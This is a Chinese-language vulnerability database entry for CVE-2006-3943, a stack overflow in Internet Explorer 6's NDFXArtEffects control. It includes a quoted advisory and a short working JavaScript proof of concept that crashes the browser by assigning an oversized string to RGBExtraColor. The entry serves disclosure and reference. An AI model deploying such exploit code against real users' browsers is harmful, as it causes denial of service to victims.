Microsoft Internet Explorer NDFXArtEffects堆栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110693 漏洞类型 缓冲区溢出
发布时间 2006-07-27 更新时间 2006-08-02
CVE编号 CVE-2006-3943 CNNVD-ID CNNVD-200607-521
漏洞平台 Windows CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/28286
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-521
|漏洞详情
WindowsXPSP2上的MicrosoftInternetExplorer6中的NDFXArtEffects存在基于堆栈的缓冲区溢出。远程攻击者可以借助长的(1)RGBExtraColor,(2)RGBForeColor和(3)RGBBackColor属性,引起拒绝服务(崩溃)。
|漏洞EXP
source: http://www.securityfocus.com/bid/19184/info

Microsoft Internet Explorer is prone to a stack-overflow vulnerability.

This issue is triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

var b = 'XXXX';
while(b.length <=1024*1024) b+=b;
var a = new ActiveXObject('DXImageTransform.Microsoft.NDFXArtEffects.1');
var i = 1016320;
a.RGBExtraColor = b.substring(0,i);
|参考资料

来源:XF
名称:ie-rgb-properties-dos(28046)
链接:http://xforce.iss.net/xforce/xfdb/28046
来源:BID
名称:19184
链接:http://www.securityfocus.com/bid/19184
来源:OSVDB
名称:27530
链接:http://www.osvdb.org/27530
来源:MISC
链接:http://browserfun.blogspot.com/2006/07/mobb-27-ndfxarteffects-rgbextracolor.html